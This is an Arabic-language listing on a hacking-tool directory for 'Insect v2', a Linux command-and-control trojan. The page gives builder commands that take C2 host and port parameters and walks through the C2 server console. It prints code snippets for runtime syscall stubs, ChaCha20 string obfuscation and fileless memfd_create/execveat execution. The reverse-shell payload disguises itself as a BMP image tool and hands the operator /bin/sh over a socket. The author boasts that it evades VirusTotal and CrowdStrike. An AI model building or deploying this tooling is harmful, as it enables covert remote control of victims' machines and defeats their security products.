Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FUD-C2-Framework — إطار عمل لصدفة عكسية وC2 بدون ملفات يستفيد من استدعاءات النظام المباشرة، وأنفاق البروكسي، وتشفير ChaCha20 لتجنب مضادات الفيروسات. | Kitploit
أدوات/GitHubGitHub/x3r0day/fud-c2-framework
أدوات التشفير/فك التشفيرآليات الاستمراريةالتهرب من IDS/IPSالهندسة العكسيةشيل كودما بعد الاستغلالتحليل البرمجيات الخبيثةاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولاتحصان طروادة للوصول عن بعد
716منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubx3r0day/fud-c2-framework

FUD-C2-Framework

إطار عمل لصدفة عكسية وC2 بدون ملفات يستفيد من استدعاءات النظام المباشرة، وأنفاق البروكسي، وتشفير ChaCha20 لتجنب مضادات الفيروسات.

عرض المستودع

تنفيذ بدون ملفات وتخطٍّ للحماية

Insect v2 - إطار عمل C2

Insect هو حصان طروادة C2 لأوامر عكسية بدون ملفات وحمولات Linux للبيكون. يتخفى هذا الحصان كأداة معالجة صور BMP بعمق 24 بت. يستخدم Dynamic Syscall Stubs وmemfd_create وموارد نصية مشفرة بـ ChaCha20 وtunnel proxy وICC Profile Encryptor لتجنب التحليل الساكن. يدعم خادم C2 نوعين من الحمولات، تفاعلية وبيكون.

صياغة استدعاءات النظام يدويًا تقنية قديمة، لكن في Insect v2، قمت بتحسين طريقة بناء الـ stubs في وقت التشغيل للبقاء تحت رادار الماسحات الحديثة. من خلال بناء استدعاءات النظام ديناميكيًا، تتجنب الحمولة التوقيعات القياسية التي تلتقطها برامج مكافحة الفيروسات الساكنة عادةً.

في الاختبارات الواقعية، تجاوزت بنجاح كل محرك على VirusTotal. كما اختبرتها ضد CrowdStrike Falcon، حيث حصلت على "إشارة خضراء" دون أي اكتشافات من المحرك الساكن. أثناء التحليل الديناميكي، أثارت شكًا بسيطًا واحدًا فقط وتم تصنيفها في النهاية كآمنة أيضًا.

إخلاء المسؤولية: Insect V2 قيد التطوير، كما أنني لا أؤيد أي أنشطة غير قانونية، أنت حر في استخدامه لأغراض الفريق الأحمر. وتعديله.

البنية

server.py       →  وحدة تحكم C2 متعددة الجلسات
main.c          →  حمولة revshell (صدفة تفاعلية)
main_beacon.c   → حمولة البيكون (استقصاء مدفوع بالمهام)

البناء

لدينا ملفان تعريفيان:

# Interactive reverse shell
python3 builder.py --profile revshell --host <C2_IP> --port <C2_PORT> --domain <TUNNEL_DOMAIN>

# Task-driven beacon
python3 builder.py --profile beacon --host <C2_IP> --port <C2_PORT> --domain <TUNNEL_DOMAIN>

كلاهما ينتج ملفًا تنفيذيًا bmputil. يقوم الباني بتشفير جميع النصوص العادية بـ ChaCha20 في وقت البناء، ويشفّر ملف ELF المُجمَّع بقناع ICC profile، ويقسّمه عبر أقسام ELF مُسمّاة، ويولّد stub محمّل.

الخادم

python3 server.py

يبدأ مستمعًا على 0.0.0.0:8080 افتراضيًا.

(insect) > list                       # show active sessions
(insect) > use rev-a1b2c3d4           # interact with a revshell
(insect) > task bea-deadbeef whoami   # queue a command for a beacon
(insect) > tasks bea-deadbeef         # view completed task results
(insect) > listen beacon 0.0.0.0 9090 # start an additional listener
(insect) > exit

يتم تتبع الجلسات عبر معرّف ثابت فريد من 4 بايت مضمّن في وقت البناء.

جلسات Revshell

عند التنفيذ على الجهاز المستهدف، تقبل الحمولة وسائط وهمية للحفاظ على الشرعية:

./bmputil input.bmp output.bmp --grayscale

تحت الغطاء، تتفرّع العملية، وتتصل مرة أخرى بـ C2 عبر نفق مصافحة Minecraft (playit.gg)، وتنتظر مُشغّل 0xDEAD. بمجرد تشغيله، تعيد توجيه stdin/stdout/stderr إلى المقبس وتُشغّل /bin/sh.

يحتفظ خادم C2 باتصالات revshell في سجل الجلسات. استخدم use <id> لربط طرفيتك بجلسة.

جلسات البيكون

تتصل البيكونات، وتُسجّل بمعرّف beacon_id المضمّن، وتتحقق من المهام المعلّقة، وتنفّذها عبر fork + pipe + execve، وتُبلّغ بالنتائج، ثم تنام لمدة 30 ثانية وتعيد الاتصال.

استخدم task <id> <command> لجدولة العمل. تُخزَّن النتائج في الذاكرة وتُعرض بـ tasks <id>.

الجوانب التقنية.

يتشارك الملفان التعريفيان نفس بدائيات التخطي:

البناء الديناميكي لاستدعاءات النظام

uint8_t stub[] = {
    0x48, 0x89, 0xf8, 0x48, 0x89, 0xf7, 0x48, 0x89, 0xd6, 
    0x48, 0x89, 0xca, 0x4d, 0x89, 0xc2, 0x4d, 0x89, 0xc8, 
    0x0f, 0x05, 0xc3
};

memcpy(buf + payload_size, stub, sizeof(stub));
long (*_sys)(long, long, long, long, long, long, long) = (void *)(buf + payload_size);

كما نوقش سابقًا، يتم بناء أكواد opcodes لاستدعاءات النظام (0F 05) في وقت التشغيل في ذاكرة قابلة للتنفيذ لتجنب التحليل الساكن.

تشفير النصوص بـ ChaCha20

static void _transform_resource(
        const uint8_t *in, uint8_t *out, int len,
        const uint8_t nce[8], int add_null
) {
        uint32_t state[16] = {
                0x61707865 ^ __CHACHA_MASK__, 0x3320646e ^ __CHACHA_MASK__, // chacha_mask = random.randint(0x10000000, 0x7FFFFFFF)
                // ...
        };
}

يتم تشفير كل نص في وقت البناء بـ nonce فريد. يحجب قناع XOR على ثوابت الحالة الاكتشافات القائمة على التوقيعات لإعداد ChaCha20.

التنفيذ بدون ملفات (memfd_create + execveat)

long fd = _sys(SYS_MEMFD_CREATE, (long)"", 0, 0, 0, 0, 0);

if (fd >= 0) {
    _sys(SYS_WRITE, fd, (long)buf, tot, 0, 0, 0);
    long p = _sys(SYS_FORK, 0, 0, 0, 0, 0, 0);
    if (p == 0) {
        char *args[] = { (char *)APP_NAME, NULL };
        _sys(SYS_EXECVEAT, fd, (long)"", (long)args, 0, AT_EMPTY_PATH, 0);
        _sys(SYS_EXIT, 1, 0, 0, 0, 0, 0);
    }
    _sys(SYS_CLOSE, fd, 0, 0, 0, 0, 0);
}

تُنفَّذ الحمولة بالكامل من الذاكرة عبر memfd_create + execveat. تقنيًا، يتم اكتشاف memfd_create وexecveat بواسطة برامج مكافحة الفيروسات لكنهما مشفّران ومبنيان في وقت التشغيل، ومن المدهش في الاختبارات الواقعية، أنه لا يتم الإبلاغ عنه.

تشفير ICC Profile (Loader Stub)

يتم تشفير ELF الوسيط بـ XOR باستخدام جدول بحث ألوان ICC مصحّح بجاما ومفتاح عشوائي من 32 بايت، ثم يُقسَّم عبر 8 أقسام مُسمّاة .rodata.blk*. يعيد stub المحمّل تجميعها وفك تشفيرها وتنفيذها.

ملاحظات ختامية

هذه الطريقة ليست جديدة، بل هي تقنية قديمة، لكن insect v2 يعدّل ويعيد تنفيذ تقنيات مذكورة في كتابات أمنية وبرمجيات خبيثة متنوعة، يمكنك الاطلاع عليها هنا:

المراجع

  • memfd_create + execveat fileless execution - hackerschoice/memexec, kernelmethod/tardis
  • In-Memory-Only ELF Execution - MagisterQuis (2018)
  • Loading fileless Shared Objects (memfd_create + dlopen) - X-C3LL (2018)
  • Running ELF from memory / Ezuri loader - guitmz (2019)
  • Super-Stealthy Droppers - 0x00sec (2017)
  • Assembly ELF memfd loader - zznop (2018)
  • Python in-memory ELF execution - Mitsurugi (2019)
  • A Fileless ELF Dropper - Hkopp (2023)
  • Dynamic syscall stubs - SysWhispers2, SysWhispers3
  • ChaCha20 (RFC 8439) - IETF RFC 8439
  • Kiteshield ELF Packer - Qianxin XLab
تنزيل الأداة